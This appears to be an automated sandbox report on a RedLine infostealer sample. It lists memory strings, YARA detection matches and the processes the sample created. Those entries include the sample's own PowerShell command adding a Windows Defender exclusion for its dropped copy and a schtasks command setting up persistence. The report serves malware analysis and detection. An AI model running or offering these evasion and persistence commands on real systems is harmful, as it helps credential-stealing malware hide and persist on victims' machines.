                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1458811526.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000000.1433024584.0000000000D02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIlkY.exeJ vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1464913728.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460091932.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exeBinary or memory string: OriginalFilenameIlkY.exeJ vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 13P2mxLaQk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: VWGccZGgix.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, nolkxinFKGZ2pvmyP3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, nolkxinFKGZ2pvmyP3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/100@2/1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File created: C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File created: C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp
                    Source: 13P2mxLaQk.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\SysWOW64\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: tmp46C4.tmp.7.dr, tmp5C9F.tmp.7.dr, tmp5C8E.tmp.7.dr, tmp2629.tmp.7.dr, tmp46C3.tmp.7.dr, tmp263A.tmp.7.dr, tmp7F1B.tmp.7.dr, tmp80B7.tmp.13.dr, tmpDC53.tmp.13.dr, tmp5CAF.tmp.7.dr, tmpDC54.tmp.13.dr, tmpDC33.tmp.13.dr, tmp7F3C.tmp.7.dr, tmp8084.tmp.13.dr, tmp80A5.tmp.13.dr, tmp7F5C.tmp.7.dr, tmp5C8D.tmp.7.dr, tmp7F6C.tmp.7.dr, tmpDC75.tmp.13.dr, tmp8095.tmp.13.dr, tmp8073.tmp.13.dr, tmpA505.tmp.13.dr, tmpDC76.tmp.13.dr, tmp80B6.tmp.13.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 13P2mxLaQk.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File read: C:\Users\user\Desktop\13P2mxLaQk.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\13P2mxLaQk.exe "C:\Users\user\Desktop\13P2mxLaQk.exe"
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VWGccZGgix.exe C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: 13P2mxLaQk.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 13P2mxLaQk.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.cs .Net Code: FBIEZyQhi0 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.cs .Net Code: FBIEZyQhi0 System.Reflection.Assembly.Load(byte[])
